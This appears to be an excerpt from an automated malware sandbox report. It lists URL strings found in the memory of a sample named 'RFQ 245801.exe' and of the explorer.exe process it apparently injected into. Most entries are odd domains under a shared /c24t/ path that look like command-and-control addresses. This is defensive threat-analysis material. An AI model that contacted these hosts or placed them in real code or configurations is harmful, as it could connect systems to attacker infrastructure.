          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.458881233.men
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.458881233.men/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.458881233.men/c24t/www.delark.click
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.458881233.menReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aithful.events
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aithful.events/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aithful.events/c24t/www.ealerslot.net
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aithful.eventsReferer:
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000006.00000003.3482833958.000000000C9B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1749071753.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160246853.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3112813683.000000000C9AE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyz
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyz/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyz/c24t/www.khizmetlergirisyapzzz2024.net
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.click
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.click/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.click/c24t/www.ilw.legal
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.clickReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.net
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.net/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.net/c24t/www.orenzoplaybest14.xyz
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.netReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bond
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bond/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bond/c24t/www.458881233.men
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bondReferer:
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilw.legal
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilw.legal/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilw.legal/c24t/www.02s-pest-control-us-ze.fun
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilw.legalReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travel
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travel/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travel/c24t/www.venir-bienne.info
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travelReferer:
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.net
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.net/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.net/c24t/www.lc-driving-school.net
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.netReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lc-driving-school.net
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lc-driving-school.net/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lc-driving-school.net/c24t/www.aithful.events
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lc-driving-school.netReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/c24t/www.earing-tests-69481.bond
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.eventsReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orenzoplaybest14.xyz
          Source: explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orenzoplaybest14.xyz/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orenzoplaybest14.xyzReferer:
